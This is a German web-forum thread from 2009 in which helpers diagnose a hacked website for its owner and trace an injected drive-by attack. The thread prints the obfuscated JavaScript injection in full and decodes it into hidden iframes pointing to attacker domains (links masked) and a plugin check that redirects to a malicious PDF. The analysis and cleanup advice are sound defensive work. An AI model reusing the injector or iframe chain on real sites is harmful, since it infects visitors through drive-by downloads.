erledigt thx!
Attackierend gemeldete Website - Ratlos!?
-
speedstar -
13. April 2009 um 13:25 -
Erledigt
-
Nun, beim betreten deiner Seite bekam ich erstmal einen PDF Download präsentiert. Da in letzter Zeit Sicherheitslücken im Adobe Acrobat gefunden wurden, ist das wohl einer der Ansatzpunkte.
Aufgefallen ist mir folgendes:
Code
Alles anzeigen<body><script>eval(unescape('%u002f%u002a%u0068%u006b%u0069% u007a%u006a%u0073%u0070%u0068%u002a%u002f%u0076% u0061%u0072%u002f%u002a%u006b%u0077%u0061%u0079% u006b%u0065%u0072%u0061%u002a%u002f%u0079%u0069% u0076%u0078%u0079%u003d%u0022%u0030%u0039%u0030% u0032%u0030%u0038%u0031%u0038%u0037%u0032%u0030% u0034%u0031%u0032%u0032%u0032%u0030%u0033%u0031% u0033%u0038%u0031%u0035%u0031%u0031%u0039%u0030% u0032%u0030%u0031%u0031%u0038%u0039%u0032%u0030% u0037%u0031%u0039%u0039%u0031%u0039%u0031%u0032% u0030%u0030%u0032%u0030%u0036%u0031%u0033%u0036% u0031%u0038%u0039%u0032%u0030%u0034%u0031%u0039% u0031%u0031%u0038%u0037%u0032%u0030%u0036%u0031% u0039%u0031%u0031%u0035%u0039%u0031%u0039%u0038% u0031%u0039%u0031%u0031%u0039%u0039%u0031%u0039% u0031%u0032%u0030%u0030%u0032%u0030%u0036%u0031% u0033%u0030%u0031%u0032%u0039%u0031%u0039%u0035% u0031%u0039%u0032%u0032%u0030%u0034%u0031%u0038% u0037%u0031%u0039%u0039%u0031%u0039%u0031%u0031% u0032%u0039%u0031%u0033%u0031%u0031%u0034%u0039% u0032%u0030%u0033%u0031%u0033%u0038%u0031%u0033% u0036%u0032%u0030%u0035%u0032%u0030%u0034%u0031% u0038%u0039%u0031%u0035%u0031%u0031%u0032%u0039% u0031%u0039%u0034%u0032%u0030%u0036%u0032%u0030% u0036%u0032%u0030%u0032%u0031%u0034%u0038%u0031% u0033%u0037%u0031%u0033%u0037%u0031% u0038%u0038%u0031%u0039%u0031%u0032%u0030%u0035% u0032%u0030%u0036%u0031%u0039%u0032%u0031%u0039% u0035%u0032%u0030%u0030%u0031%u0039%u0030%u0031% u0038%u0037%u0031%u0039%u0034%u0032%u0030%u0031% u0031%u0039%u0039%u0031%u0039%u0031%u0031%u0033% u0036%u0031%u0038%u0039%u0032%u0030%u0030%u0031% u0033%u0037%u0031%u0039%u0034%u0032%u0030%u0031% u0031%u0039%u0039%u0031%u0039%u0031%u0031%u0033% u0036%u0031%u0039%u0034%u0032%u0030%u0036%u0031% u0039%u0039%u0031%u0039%u0038%u0031%u0032% u0039%u0031%u0034%u0039%u0032%u0030%u0033%u0031% u0033%u0038%u0031%u0033%u0036%u0032%u0030%u0035% u0032%u0030%u0036%u0032%u0031%u0031%u0031%u0039% u0038%u0031%u0039%u0031%u0031%u0033%u0036%u0031% u0039%u0030%u0031%u0039%u0035%u0032%u0030%u0035% u0032%u0030%u0032%u0031%u0039%u0038%u0031%u0038% u0037%u0032%u0031%u0031%u0031%u0035%u0031%u0031% u0032%u0039%u0032%u0030%u0030%u0032%u0030%u0031% u0032%u0030%u0030%u0031%u0039%u0031%u0031%u0032% u0039%u0031%u0034%u0039%u0031%u0039%u0030% u0032%u0030%u0031%u0031%u0038%u0039%u0032%u0030% u0037%u0031%u0039%u0039%u0031%u0039%u0031%u0032% u0030%u0030%u0032%u0030%u0036%u0031%u0033%u0036% u0031%u0038%u0038%u0032%u0030%u0031%u0031%u0039% u0030%u0032%u0031%u0031%u0031%u0033%u0036%u0031% u0038%u0037%u0032%u0030%u0032%u0032%u0030%u0032% u0031%u0039%u0031%u0032%u0030%u0030%u0031%u0039% u0030%u0031%u0035%u0037%u0031%u0039%u0034%u0031% u0039%u0035%u0031%u0039%u0038%u0031%u0039%u0030% u0031%u0033%u0030%u0032%u0030%u0033%u0031% u0033%u0038%u0031%u0033%u0031%u0031%u0034%u0039% u0022%u003b%u0076%u0061%u0072%u002f%u002a%u0066% u006f%u0067%u0064%u0069%u0071%u006b%u002a%u002f% u0073%u006c%u0078%u0064%u0072%u003d%u0022%u0022% u003b%u0066%u006f%u0072%u0028%u0076%u0061%u0072% u002f%u002a%u006a%u0062%u0076%u006e%u0062%u0068% u002a%u002f%u0068%u0061%u006a%u0078%u006e%u0072% u003d%u0033%u003b%u0068%u0061%u006a%u0078%u006e% u0072%u003c%u0079%u0069%u0076%u0078%u0079%u002e% u006c%u0065%u006e%u0067%u0074%u0068%u003b%u002f% u002a%u0063%u0076%u0073%u0071%u002a%u002f%u0068% u0061%u006a%u0078%u006e%u0072%u002b%u003d%u0033% u0029%u0073%u006c%u0078%u0064%u0072%u002b%u003d% u0053%u0074%u0072%u0069%u006e%u0067%u002e%u0066% u0072%u006f%u006d%u0043%u0068%u0061%u0072%u0043% u006f%u0064%u0065%u002f%u002a%u0068%u006f%u006e% u0070%u006d%u002a%u002f%u0028%u0079%u0069%u0076% u0078%u0079%u002e%u0073%u0075%u0062%u0073%u0074% u0072%u0069%u006e%u0067%u0028%u0068%u0061%u006a% u0078%u006e%u0072%u002c%u002f%u002a%u0075%u0071% u0065%u0064%u0079%u0074%u0070%u0079%u002a%u002f% u0068%u0061%u006a%u0078%u006e%u0072%u002b%u0033% u0029%u002d%u0079%u0069%u0076%u0078%u0079%u002f% u002a%u0064%u006d%u002a%u002f%u002e%u0073%u0075% u0062%u0073%u0074%u0072%u0069%u006e%u0067%u0028% u0030%u002c%u0033%u0029%u0029%u003b%u002f%u002a% u006a%u0069%u0062%u0074%u0072%u007a%u0071%u0075% u0077%u002a%u002f%u0073%u0065%u0074%u0054%u0069% u006d%u0065%u006f%u0075%u0074%u0028%u0022%u0065% u0076%u0061%u006c%u0028%u0073%u006c%u0078%u0064% u0072%u0029%u003b%u0022%u002c%u0031%u0030%u0030% u0029%u003b%u002f%u002a%u0069%u0073%u0071%u006a% u006e%u0073%u002a%u002f'));</script><85>
Ich habe das Gefühl das gehört da nicht rein, verschüsseltes JavaScript ist eher ungewöhnlich. Solcher Code befindet sich übrigens in jeder deiner HTML Dateien.Ich würde die jegliche Zugangsdaten deines Webspace/Servers betreffend ändern und eine aktualisierung deiner Serversoftware veranlassen.
-
WTF :shock:
Danke schonmal! Da hats echt mal jemand drauf
Würde Dreamweaver da was finden?
-
Dreamweaver kann da nicht viel machen, das ist zum erstellen von Internetseiten da, das prüft nicht ob irgendwelche Teile was böses machen. Da wird nur Handarbeit helfen.
-
Als ich deine Seite mit Opera und Safari (Win) besuchte,
wurde mir eine Datei in meinen Temp-Ordner geschrieben,
auf die sich sogleich mein Virenscanner gestürzt hat...Habe diese Datei in eine zip-Datei gepackt und zur Analysen an VirusTotal und VirScan.org gesandt.
Hier deren Ergebnisse:
http://www.virustotal.com/analisis/8bf31…53167c595a7f2ef
http://virscan.org/report/09727c3…fe508e6218.htmlGruß
Wawuschel -
Womit meine Vermutung des PDF Exploits sich erhärtet hätte. Stellt sich nur die Frage wie das da reingekommen ist. Wie gesagt, Serversoftware aktualisieren (lassen) und sämtliche Zugangsdaten ändern.
-
OK.
Zu den infizierten Dateien, soll ich die alle löschen und nochmal neu draufladen oder kann man diesen "Code" der da seinen Unfug treibt irgendwie entfernen?
Zum Update der Serversoftware müsste ich mich an den Hoster wenden wenn ich das richtig interpretiere, wie stehen da die Chancen dass der das auch macht?
Entschuldigt die vielen Fragen, mein Fachgebiet ist Jura, habe mit Informatik/ EDV leider wenig tieferen Einblick als der übliche Standart sag ich mal.
Aber dank euch, bis jetzt seit ihr mir ne Super Hilfe!
-
Die Dateien musst du nicht löschen. Das simple entfernen des script Zeugs reicht. Aber das
Code<body>bitte drinlassen, das ist ganz lieb und gehört da rein.
Aber du musst natürlich vorbeugen das sowas nicht nochmal passiert. Sämtliche (wirklich alles!) Zugangsdaten für deinen Webspace ändern und den Serverbetreiber auf dein Problem hindeuten, vielleicht können die ja rausfinden wie das reingekommen ist und das Loch beheben.
P.S.: Wir helfen doch gerne :wink: .
-
Zitat
Aufgefallen ist mir folgendes:
Code<body><script>eval(unescape('%u002f%u002a%u0068%u006b%u0069% ...
Ergibt (von Kommentaren bereinigt und Variableninhalt verkürzt) zunächst:Codevar yivxy="09020818...1149"; var slxdr=""; for(var hajxnr=3;hajxnr<yivxy.length;hajxnr+=3) slxdr+=String.fromCharCode(yivxy.substring(hajxnr,hajxnr+3)-yivxy.substring(0,3)); setTimeout("eval(slxdr);",100);
Die Variable yivxy enthält eine weitere Kodierung, die über die Schleife aufgelöst wird. Der Inhalt der Variablen slxdr wird im Anschluss dann ausgewertet und ergibt (Link maskiert):Codevar q0=document.createElement('iframe'); q0.src='h**p://bestfindahome.cn/home.html'; q0.style.display='none'; document.body.appendChild(q0);
Eine Einbindung über IFrame, die wieder auf kodierten JS-Code führt. Diesen ausgewertet (verkürzt und bereinigt) ergibt:Codes = ">khtcog\"ute?)jvvr...khtcog@"; for(i=/0; i<s.length;i++) { document.write(String.fromCharCode(s.charCodeAt(i)-2)); }
Der Code schreibt wiederum zwei IFrames in die Seite (Links maskiert):Code<iframe src='h**p://bestfindahome.cn/kitchen.html' width='0' height='0'></iframe><iframe src='h**p://bestfindahome.cn/watchman.html' width='0' height='0'></iframe>
Der erste IFrame enthält dann wieder eine solche Kodierung und führt zu einer IFrame-Einbindung der Seite h**p://http://tixwagoq.cn/in.cgi?4
Dort findet sich dann schließlich die Weiterleitung zu dem mit Schadcode behafteten PDF.Code
Alles anzeigenfunction PDF() { for (var i=0;i<navigator.plugins.length;i++) { var name = navigator.plugins[i].name; if (name.indexOf("Adobe Acrobat") != -1) { location.href = "spl/pdf.pdf"; } } } PDF();ZitatNun, beim betreten deiner Seite bekam ich erstmal einen PDF Download präsentiert.
Es ist nicht empfehlenswert (insbesondere für unbedarfte User) so eine Seite mit Produktivsystemen oder ohne zusätzliche Vorkehrungen zu betreten. Man sollte sich nicht auf AV/FW-Software verlassen, auch 0day-Lücken könnten dort ausgenutzt werden. In einem so gelagerten Fall sollte man vor allem weder mit aktivierten Plugins noch mit aktivem JS die Seite aufrufen.
Ist übrigens hier auch einmal ein Beispiel, dass die Nützlichkeit von NoScript verdeutlicht. -
die Seite ist wohl vorerst vom Netz genommen worden.
Error 404
-
Die Tuning-Seite ja, aber die Chinesen-Seiten mit der Malware nicht.
-
Dann wäre das Symptom beseitigt, aber nicht die Ursache. Du solltest (ggf. zusammen mit dem Hoster) analysieren, wie es zu dem Einbruch kam und diese Lücke schließen. Wurde aber schon darauf hingewiesen.
-
Zitat von boardraider
Dann wäre das Symptom beseitigt, aber nicht die Ursache. Du solltest (ggf. zusammen mit dem Hoster) analysieren, wie es zu dem Einbruch kam und diese Lücke schließen. Wurde aber schon darauf hingewiesen.
Der meinte nur zusätzliche Sicherheitssoftware draufhauen... Nich gerade sonderlich gesprächlich der Typ :roll:
-
Zusätzliche Sicherheitssoftware? Auf seinem System? Soll er doch machen *eg*
Im Ernst, ich habe leider nicht sehen können, welche Software du selbst dort einsetzt, ggf. findet sich auch in der Hinsicht die Schwachstelle.
